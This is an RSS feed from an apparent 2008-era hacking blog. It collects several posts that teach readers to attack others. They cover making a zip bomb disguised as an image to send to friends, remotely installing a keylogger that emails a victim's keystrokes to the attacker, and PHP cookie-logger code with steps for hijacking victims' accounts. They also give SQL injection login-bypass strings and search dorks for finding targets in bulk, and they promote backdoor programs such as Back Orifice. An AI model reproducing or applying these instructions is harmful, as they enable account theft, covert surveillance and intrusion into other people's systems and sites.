<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking Truths &#187; Bad Boy</title>
	<atom:link href="http://www.hungry-hackers.com/category/bad-boy/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hungry-hackers.com</link>
	<description>Hacking is fun, If you are a &#34;Hacker&#34;!</description>
	<lastBuildDate>Wed, 11 Jan 2012 19:43:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>Freak out your Friends Using a Zip Bomb</title>
		<link>http://www.hungry-hackers.com/2009/06/freak-out-your-friends-using-a-zip-bomb.html</link>
		<comments>http://www.hungry-hackers.com/2009/06/freak-out-your-friends-using-a-zip-bomb.html#comments</comments>
		<pubDate>Sat, 20 Jun 2009 13:42:33 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Archieve]]></category>
		<category><![CDATA[Bomb]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[Zip]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=710</guid>
		<description><![CDATA[A zip bomb, also known as a Zip of Death, is a malicious archive file designed to crash or render useless the program or system reading it. It is often used by virus writers to disable antivirus software, so that a more traditional virus sent afterwards could get into system undetected.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">A zip bomb, also known as a Zip of Death, is a malicious archive file designed to crash or render useless the program or system reading it. It is often used by virus writers to disable antivirus software, so that a more traditional virus sent afterwards could get into system undetected. A zip bomb is usually a small file (up to a few hundred kilobytes) for ease of transport and to avoid suspicion. However, when the file is unpacked its contents are more than the system can handle.You can make your own zip bomb to annoy your friends or just out of curiosity (or wilderness) to experiment with it. Make sure you don&#8217;t detonate it on yourself.</p>
<p style="text-align: justify;">Here is how to make your own Zip Bomb of Death -</p>
<ol style="text-align: justify;">
<li>Create a new text file,name it a.txt</li>
<li>Open and type the null character (alt + 255) in it.</li>
<li>Now press Ctrl + A then Ctrl + V a couple times to make some null bytes.</li>
<li>Open Command prompt and navigate to the folder containing a.txt . Type the following command:<br />
<blockquote><p>copy /b *.txt b.txt</p></blockquote>
</li>
</ol>
<p style="text-align: justify;">This will write all the contents of a.text and its copies into a new text file called b.txt,hence making every copy is a super copy. Repeat the above steps from the beginning again and again to make a really big text file.</p>
<p style="text-align: justify;">Once u have a nice empty big text file like 1gb or more,then compress it using Winrar or Winzip into a zip file.</p>
<p style="text-align: justify;">You will find that it will be compressed to very small size (about 1MB ). It is because of the simple construction of the file as the text file contains 1gb of null bytes.</p>
<p style="text-align: justify;">Make sure that <strong>YOU DONT OPEN THIS</strong> afterwards.</p>
<p style="text-align: justify;">You can make the same file in Linux by typing -</p>
<blockquote style="text-align: justify;"><p>dd if=/dev/zero bs=1000 count=1000000 | gzip &gt; test.gz</p></blockquote>
<p style="text-align: justify;">Send it to your friends (or foes) and it will definitely annoy them . Use some creativity and rename the text file into some thing like Angelina Jolie.jpg and compress it and email to your friends. Once they download it,they will never be able to download again (sarcasm..sarcasm).More disastrous combinations can be made by experimenting with it.I mean..you get the idea <img src='http://www.hungry-hackers.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p style="text-align: justify;">If you are too lazy like me and you don&#8217;t want to do all this then you can download the most dangerous zip bombs of all time from <a title="42.zip" href="http://www.unforgettable.dk/42.zip" target="_blank">here</a>. This size of this zip is only 42 KB which will uncompress to about 4 Petabytes (1 Peta byte = 1024 TB and 1 TB = 1024 GB ) of file size. Dangerous huh..?</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=710&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2009/06/freak-out-your-friends-using-a-zip-bomb.html/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Installing a Keylogger on a Remote Machine</title>
		<link>http://www.hungry-hackers.com/2009/03/installing-a-keylogger-on-a-remote-machine.html</link>
		<comments>http://www.hungry-hackers.com/2009/03/installing-a-keylogger-on-a-remote-machine.html#comments</comments>
		<pubDate>Tue, 31 Mar 2009 13:03:25 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Back Doors]]></category>
		<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Email Hacking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Keyloggers]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Spyware]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Install]]></category>
		<category><![CDATA[Keylogger]]></category>
		<category><![CDATA[Remote]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Triscks]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=567</guid>
		<description><![CDATA[Hello friends,

In my previous article "How To Write A Basic Keylogger In VB" I showed you how to write your own keylogger. Today I will show you how to install a Keylogger on a Remote PC without the knowledge of the owner and you will get all the keystroke information through Email.]]></description>
			<content:encoded><![CDATA[<p>Hello friends,</p>
<p>In my previous article &#8220;<a rel="bookmark" href="http://www.hungry-hackers.com/2008/05/how-to-write-a-keylogger.html">How To Write A Basic Keylogger In VB</a>&#8221; I showed you how to write your own keylogger. Today I will show you how to install a Keylogger on a Remote PC without the knowledge of the owner and you will get all the keystroke information through Email.</p>
<p><em><strong>Note:</strong> This article is for educational purpose only and the author won&#8217;t be responsible for any kind of damage caused by following the information given in this article.</em></p>
<p>Now to install a Keylogger on a Remote Computer you have to follow the steps given below:</p>
<ol>
<li>First of all download Winspy keylogger software from link given below:<br />
<blockquote><p><a title="Winspy Keylogger" href="http://hop.clickbank.net/?hungryhack/bccomp" target="_blank">http://www.win-spy.com/</a></p></blockquote>
</li>
<li>After downloading this software, run the .exe. You will be asked to register yourself where you will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.</li>
<li>Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.<a href="http://www.hungry-hackers.com/wp-content/uploads/2009/03/win-spy-1.jpg"><img class="aligncenter size-full wp-image-571" title="win-spy-1" src="http://www.hungry-hackers.com/wp-content/uploads/2009/03/win-spy-1.jpg" alt="win-spy-1" width="407" height="239" /></a></li>
<li>Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.<a href="http://www.hungry-hackers.com/wp-content/uploads/2009/03/winspy-2.jpg"><img class="aligncenter size-full wp-image-572" title="winspy-2" src="http://www.hungry-hackers.com/wp-content/uploads/2009/03/winspy-2.jpg" alt="winspy-2" width="235" height="145" /></a></li>
<li>Now, Winspy’s main screen will be displayed as shown in image below:<a href="http://www.hungry-hackers.com/wp-content/uploads/2009/03/winspy-3.jpg"><img class="aligncenter size-full wp-image-573" title="winspy-3" src="http://www.hungry-hackers.com/wp-content/uploads/2009/03/winspy-3.jpg" alt="winspy-3" width="450" height="280" /></a></li>
<li>Select Remote at top, then Remote install.</li>
<li>On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.<a href="http://www.hungry-hackers.com/wp-content/uploads/2009/03/winspy-4.jpg"><img class="aligncenter size-full wp-image-574" title="winspy-4" src="http://www.hungry-hackers.com/wp-content/uploads/2009/03/winspy-4.jpg" alt="winspy-4" width="450" height="300" /></a><br />
<blockquote><p>User &#8211; type in the victim’s name<br />
File name &#8211; Name the file to be sent. Use the name such that victim will love to accept it.<br />
File icon &#8211; Keep it the same<br />
Picture &#8211; select the picture you want to apply to the keylogger.<br />
Email keylog to &#8211; Enter your Email address. Hotmail and Yahoo doesnot accept Keylog Files so enter other email address.<br />
Thats it. This much is enough. If you want, can change other settings also.</p></blockquote>
</li>
<li><span class="fullpost">After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Myspace account password.</span></li>
</ol>
<p><span class="fullpost">So guys, I hope you have got the trick on how to <strong></strong><strong>hack </strong>any email account passwords from this article. If you have any comment or views about article, feel free to mention it in comments section.</span></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=567&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2009/03/installing-a-keylogger-on-a-remote-machine.html/feed</wfw:commentRss>
		<slash:comments>45</slash:comments>
		</item>
		<item>
		<title>Create a CookieLogger and Hack any Account</title>
		<link>http://www.hungry-hackers.com/2008/11/create-a-cookielogger-and-hack-any-account.html</link>
		<comments>http://www.hungry-hackers.com/2008/11/create-a-cookielogger-and-hack-any-account.html#comments</comments>
		<pubDate>Sat, 22 Nov 2008 09:53:22 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Email Hacking]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Orkut Hacking]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Account]]></category>
		<category><![CDATA[Cookie]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Logger]]></category>
		<category><![CDATA[MSN]]></category>
		<category><![CDATA[Orkut]]></category>
		<category><![CDATA[Sniffing]]></category>
		<category><![CDATA[Stealling]]></category>
		<category><![CDATA[Yahoo]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=377</guid>
		<description><![CDATA[Cookies stores all the necessary Information about one's account , using this information you can hack anybody's account and change his password. If you get the Cookies of theVictim you can Hack any account the Victim is Logged into. A CookieLogger is a Script that is Used to Steal anybodies Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger...Hope you will enjoy Reading it ...]]></description>
			<content:encoded><![CDATA[<p>Cookies stores all the necessary Information about one&#8217;s account , using this information you can hack anybody&#8217;s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.</p>
<p><strong>What is a CookieLogger?</strong></p>
<p>A CookieLogger is a Script that is Used to Steal anybody&#8217;s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.</p>
<p>Today I am going to show How to make your own Cookie Logger&#8230;Hope you will enjoy Reading it &#8230;</p>
<p><strong>Step 1: </strong>Save the notepad file from the link below and Rename it as Fun.gif:</p>
<blockquote><p><a title="Script1" href="http://w18.easy-share.com/1702516956.html" target="_blank">Download it.</a></p></blockquote>
<p><strong>Step 2: </strong>Copy the Following Script into a Notepad File and Save the file as cookielogger.php:</p>
<blockquote><p>$filename = &#8220;logfile.txt&#8221;;<br />
if (isset($_GET["cookie"]))<br />
{<br />
if (!$handle = fopen($filename, &#8216;a&#8217;))<br />
{<br />
echo &#8220;Temporary Server Error,Sorry for the inconvenience.&#8221;;<br />
exit;<br />
}<br />
else<br />
{<br />
if (fwrite($handle, &#8220;\r\n&#8221; . $_GET["cookie"]) === FALSE)<br />
{<br />
echo &#8220;Temporary Server Error,Sorry for the inconvenience.&#8221;;<br />
exit;<br />
}<br />
}<br />
echo &#8220;Temporary Server Error,Sorry for the inconvenience.&#8221;;<br />
fclose($handle);<br />
exit;<br />
}<br />
echo &#8220;Temporary Server Error,Sorry for the inconvenience.&#8221;;<br />
exit;<br />
?&gt;</p></blockquote>
<p><strong>Step 3: </strong>Create a new Notepad File and Save it as logfile.txt</p>
<p><strong>Step 4:</strong> Upload this file to your server</p>
<p>cookielogger.php -&gt; http://www.yoursite.com/cookielogger.php<br />
logfile.txt -&gt; http://www.yoursite.com/logfile.txt (chmod 777)<br />
fun.gif -&gt; http://www.yoursite.com/fun.gif</p>
<p>If you don&#8217;t have any Website then you can use the following Website to get a Free Website which has php support :</p>
<blockquote><p>http://0fees.net</p></blockquote>
<p><strong>Step 5: </strong>Go to the victim forum and insert this code in the signature or a post :</p>
<blockquote><p><a title="Script2" href="http://w14.easy-share.com/1702516964.html" target="_blank">Download it.</a></p></blockquote>
<p><strong>Step 6: </strong>When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:</p>
<blockquote><p>phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9</p></blockquote>
<p><strong>Step 7:</strong> To get the access to the Victim&#8217;s Account you need to replace your cookies with the Victim&#8217;s Cookie. You can use a Cookie Editor for this. The string before &#8220;=&#8221; is the name of the cookie and the string after &#8220;=&#8221; is its value. So Change the values of the cookies in the cookie Editor.</p>
<p><strong>Step 8: </strong>Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim&#8217;s account information.</p>
<p><strong>Note : </strong>Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim&#8217;s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.</p>
<p><strong>Disclaimer: </strong>I don&#8217;t take Responsibility for what you do with this script, served for Educational purpose only. <strong>&#8230;</strong></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=377&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/11/create-a-cookielogger-and-hack-any-account.html/feed</wfw:commentRss>
		<slash:comments>56</slash:comments>
		</item>
		<item>
		<title>Eavesdropping on Bluetooth Headsets</title>
		<link>http://www.hungry-hackers.com/2008/11/eavesdropping-on-bluetooth-headsets.html</link>
		<comments>http://www.hungry-hackers.com/2008/11/eavesdropping-on-bluetooth-headsets.html#comments</comments>
		<pubDate>Sat, 22 Nov 2008 05:42:03 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Bluejacking]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[Mobile Hacking]]></category>
		<category><![CDATA[Bluetooth]]></category>
		<category><![CDATA[Device]]></category>
		<category><![CDATA[Eavesdropping]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Headsets]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=375</guid>
		<description><![CDATA[Here's a short video in which Joshua Wright demonstrates how a Bluetooth headset can be hijacked, allowing audio to be captured or sent to the device]]></description>
			<content:encoded><![CDATA[<p><span><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="349" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/1c-jzYAH2gw&amp;hl=en&amp;fs=1&amp;rel=0&amp;color1=0x3a3a3a&amp;color2=0x999999&amp;border=1" /><embed type="application/x-shockwave-flash" width="425" height="349" src="http://www.youtube.com/v/1c-jzYAH2gw&amp;hl=en&amp;fs=1&amp;rel=0&amp;color1=0x3a3a3a&amp;color2=0x999999&amp;border=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></span></p>
<p>Here&#8217;s a short video in which Joshua Wright demonstrates how a <a title="Super Bluetooth Hack 2008(Latest Version)" href="http://www.hungry-hackers.com/2008/07/super-bluetooth-hack-2008-latest.html" target="_self">Bluetooth headset can be hijacked</a>, allowing audio to be captured or sent to the device:</p>
<blockquote><p>Few users realize that Bluetooth headsets can be exploited granting a remote attacker the ability to record and inject audio through the headset while the device is not in an active call. SANS Institute author and senior instructor Joshua Wright demonstrates.</p></blockquote>
<p>All that is necessary is knowing the device address, which can be easily sniffed, and the secret pin, which defaults to 0000. The headset audio is tapped while not in a call, so any room conversation the headset&#8217;s mic can pick up can potentially be listened to remotely.</p>
<p>To Download the software to Hack a Bluetooth Enabled Phone <a title="Super Bluetooth Hack 2008(Latest Version)" href="http://www.hungry-hackers.com/2008/07/super-bluetooth-hack-2008-latest.html" target="_self">Click Here</a>.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=375&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/11/eavesdropping-on-bluetooth-headsets.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Latest Orkut Hack</title>
		<link>http://www.hungry-hackers.com/2008/10/latest-orkut-hack.html</link>
		<comments>http://www.hungry-hackers.com/2008/10/latest-orkut-hack.html#comments</comments>
		<pubDate>Wed, 15 Oct 2008 18:32:21 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[Orkut Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Malicious]]></category>
		<category><![CDATA[Orkut]]></category>
		<category><![CDATA[Script]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=359</guid>
		<description><![CDATA[Hello Friend,

I just wanted to warn you about a New Malicious Script that is running in Orkut which changes your Profile Image.]]></description>
			<content:encoded><![CDATA[<p>Hello Friend,</p>
<p>I just wanted to warn you about a New Malicious Script that is running in Orkut which changes your Profile Image.</p>
<p>The following is what Vandini, an Orkut Guide, wanted to share with you:</p>
<blockquote><p>Hi Guys,</p>
<p>We are aware that some malicious scripts have spread in guise of event<br />
notifications and have changed some profile photos. We are fixing such<br />
affected profiles immediately. If you see something like &#8216;Title: &lt;img<br />
src=&#8221;; height=&#8221;1&#8243; width = &#8220;1&#8243; on&#8230;&#8221; in an event invite email, please<br />
ignore (or delete the email).</p>
<p>We apologize for any inconvenience and thank you for the cooperation<br />
and patience.</p></blockquote>
<blockquote><p>Cheers,<br />
Vandini</p></blockquote>
<p>I would advise you to follow the instructions given by Vandini and try to spread this message to more and more user so that they are not affected by Script</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=359&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/10/latest-orkut-hack.html/feed</wfw:commentRss>
		<slash:comments>28</slash:comments>
		</item>
		<item>
		<title>List of all the SQL Injection Strings</title>
		<link>http://www.hungry-hackers.com/2008/09/list-of-all-the-sql-injection-strings.html</link>
		<comments>http://www.hungry-hackers.com/2008/09/list-of-all-the-sql-injection-strings.html#comments</comments>
		<pubDate>Sun, 28 Sep 2008 06:27:58 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Database Hacking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server Hacking]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hardcore]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[Website]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=354</guid>
		<description><![CDATA[One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article Top 10 Tricks to exploit SQL Server Systems.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article <a title="Permanent Link: Top 10 Tricks to exploit SQL Server Systems" rel="bookmark" href="http://www.hungry-hackers.com/2008/01/top-10-tricks-to-exploit-sql-server-systems.html">Top 10 Tricks to exploit SQL Server Systems</a> .</p>
<p style="text-align: justify;">First SEARCH the following Keywords in Google or any Search Engine:</p>
<p style="text-align: justify;">admin\login.asp<br />
login.asp</p>
<p style="text-align: justify;">with these two search string you will have plenty of targets to chose from&#8230;choose one that is Vulnerable</p>
<p style="text-align: justify;"><strong>INJECTION STRINGS: How to use it?</strong></p>
<p style="text-align: justify;">This is the easiest part&#8230;very simple</p>
<p style="text-align: justify;">On the login page just enter something like</p>
<p style="text-align: justify;">user:admin (you dont even have to put this.)<br />
pass:&#8217; or 1=1&#8211;</p>
<p style="text-align: justify;">or</p>
<p style="text-align: justify;">user:&#8217; or 1=1&#8211;<br />
admin:&#8217; or 1=1&#8211;</p>
<p style="text-align: justify;">Some sites will have just a password so</p>
<p style="text-align: justify;">password:&#8217; or 1=1&#8211;</p>
<p style="text-align: justify;">In fact I have compiled a <a title="Combo List" href="#combolist" target="_self">combo list</a> with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.</p>
<p style="text-align: justify;">The one I am interested in are quick access to targets</p>
<p style="text-align: justify;"><strong>PROGRAM</strong></p>
<p style="text-align: justify;">i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string</p>
<p style="text-align: justify;"><strong>combo example:</strong></p>
<p style="text-align: justify;">admin:&#8217; or a=a&#8211;<br />
admin:&#8217; or 1=1&#8211;</p>
<p style="text-align: justify;">And so on. You don&#8217;t have to be admin and still can do anything you want. The most important part is example:&#8217; or 1=1&#8211; this is our basic injection string</p>
<p style="text-align: justify;">Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever</p>
<p style="text-align: justify;">inurl:login.asp<br />
index of:/admin/login.asp</p>
<p style="text-align: justify;">like this: index of login.asp</p>
<p style="text-align: justify;">result:</p>
<p style="text-align: justify;"><a href="http://www3.google.com/search?hl=en&amp;ie=ISO...G=Google+Search" target="_blank"><span style="text-decoration: underline;"><span style="color: blue;">http://www3.google.com/search?hl=en&amp;ie=ISO&#8230;G=Google+Search</span></span></a></p>
<p style="text-align: justify;">17,000 possible targets trying various searches spews out plent more</p>
<p style="text-align: justify;">Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so</p>
<p style="text-align: justify;"><a href="http://www.somesite.com/login.asp" target="_blank"><span style="color: blue;"><span style="text-decoration: underline;">http://www.somesite.com/login.asp</span></span></a><br />
<a href="http://www.another.com/admin/login.asp" target="_blank"><span style="text-decoration: underline;"><span style="color: blue;">http://www.another.com/admin/login.asp</span></span></a></p>
<p style="text-align: justify;">and so on. In a couple of hours you can build up quite a list because I don&#8217;t select all results or spider for log in pages. I then save the list fire up Ares and enter</p>
<p style="text-align: justify;">1) A Proxy list<br />
2) My Target IP list<br />
3) My Combo list<br />
4) Start.</p>
<p style="text-align: justify;">Now I dont want to go into problems with users using Ares..thing is i know it works for me&#8230;</p>
<p style="text-align: justify;">Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable.</p>
<p style="text-align: justify;">There you go you should have access to your vulnerable target by now</p>
<p style="text-align: justify;">Another thing you can use the strings in the urls were user=? edit the url to the = part and paste &#8216; or 1=1&#8211; so it becomes</p>
<p style="text-align: justify;">user=&#8217; or 1=1&#8211; just as quick as login process</p>
<p style="text-align: justify;"><a name="combolist"></a><strong>Combo List</strong></p>
<p style="text-align: justify;"><span style="text-decoration: line-through;">There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.</span></p>
<p style="text-align: justify;">As a result of a lot of requests for the list of SQL Injection String and due to lack of time on our behalf to respond to your Comments we have now decided to give the download link for the list of SQL Injection Strings. Now you just need to Subscribe to our RSS Feed via Email and get the Download link at the bottom of the Confirmation Email. Please don&#8217;t Forget to click on the Confirmation Link given in that Email.</p>
<p style="text-align: justify;">Here is the form to Subscribe to our RSS feed via Email:</p>
<form style="border: 0px solid #cccccc; padding: 3px; text-align: justify;" action="http://www.feedburner.com/fb/a/emailverify" method="post">
<input id="feed_form" style="width: 250px;" onclick="this.value='';" name="email" type="text" value="Enter your Email Address" />
<input name="url" type="hidden" value="http://feeds.feedburner.com/~e?ffid=1825094" />
<input name="title" type="hidden" value="Hacking Truths" />
<input name="loc" type="hidden" value="en_US" />
<input type="submit" value="Subscribe" /></form>
<p style="text-align: justify;">Happy Hunting</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=354&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/09/list-of-all-the-sql-injection-strings.html/feed</wfw:commentRss>
		<slash:comments>352</slash:comments>
		</item>
		<item>
		<title>Three Most used Backdoor Programs</title>
		<link>http://www.hungry-hackers.com/2008/09/three-most-used-backdoor-programs.html</link>
		<comments>http://www.hungry-hackers.com/2008/09/three-most-used-backdoor-programs.html#comments</comments>
		<pubDate>Sun, 21 Sep 2008 10:05:24 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Back Doors]]></category>
		<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacking Computer]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Internet Hacking]]></category>
		<category><![CDATA[Keyloggers]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Trojan Horse]]></category>
		<category><![CDATA[Windows Hacking]]></category>
		<category><![CDATA[Backdoor]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hardcore]]></category>
		<category><![CDATA[Remote Access]]></category>
		<category><![CDATA[Trojans]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=353</guid>
		<description><![CDATA[There is a general misconception about security today. Most people would love to believe that their firewalls are completely capable to protect them from anything indecent. The sad part, they could not be more wrong. Hungry Hacker aim to prove it with three separate programs that can compromise the security of computers.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">There is a general misconception about security today. Most people would love to believe that their firewalls are completely capable to protect them from anything indecent. The sad part, they could not be more wrong. Hungry Hacker aim to prove it with three separate programs that can compromise the security of computers. You have the opportunity to say &#8220;What&#8217;s a backdoor?&#8221; Yes, these programs were created in 1990, but still pose a real threat today. It is the first two that are still being developed.</p>
<p style="text-align: justify;">Using these programs any noob can remotely access your computer without any Authentication and do whatever he wants. I will tell you some of the features rest of them you need to try it and find out. These Programs :</p>
<ul>
<li>Work as a key logger.</li>
<li>Send any Information from Victim&#8217;s PC to the Hacker&#8217;s PC.</li>
<li>Run any program on the Victims PC.</li>
<li>Display any Violating Image on victim&#8217;s Screen.</li>
<li>Open the CD Drive of the Victim&#8217;s PC.</li>
<li>Open any Web page on the Victims Screen.</li>
<li>Disable any Specific Key or whole Keyboard.</li>
<li>Shutdown Victim&#8217;s PC.</li>
<li>Start a Song on the Victim&#8217;s PC.etc.etc&#8230;&#8230;&#8230;&#8230;..</li>
</ul>
<p style="text-align: justify;"><strong> Back Orifice / Back Orifice 2000</strong></p>
<p style="text-align: justify;">Back Orifice is one of the most common backdoor programs, and one of the most deadly. The name may seem like a joke, but sure, the threat is real. Back Orifice was established in Cult of the Dead Cow group. Back Orifice is an Open Source Program. The main Threat of this software is that by making some changes in the code anybody can make it undetectable to the Anti virus Program running on the Victim&#8217;s computer. Apart from the strange title, the program usually gets port 31337, the reference to &#8220;Lit&#8221; phenomenon is popular among hackers.</p>
<p style="text-align: justify;">Back Orifice uses a client-server model, while the server and client is the victim attacker. What makes Back Orifice so dangerous that it can install and operate silently. There is not required interaction with the user in, meaning you could its on your computer right now, and do not know.</p>
<p style="text-align: justify;">Companies such as Symantec have taken steps to protect computers against programs that they consider dangerous. But even more attacks using Back Orifice 2000. This is due partly to the fact that it is still evolving, as open source. As stated in the documentation the goal is ultimately the presence of the Back Orifice 2000 unknown even to those who installed it.</p>
<p style="text-align: justify;">Back Orifice 2000, developed for Windows 95, Windows 98, Windows NT, Windows 2000 and Windows XP.</p>
<p style="text-align: justify;"><strong>Where can I download Back orifice 2000?</strong></p>
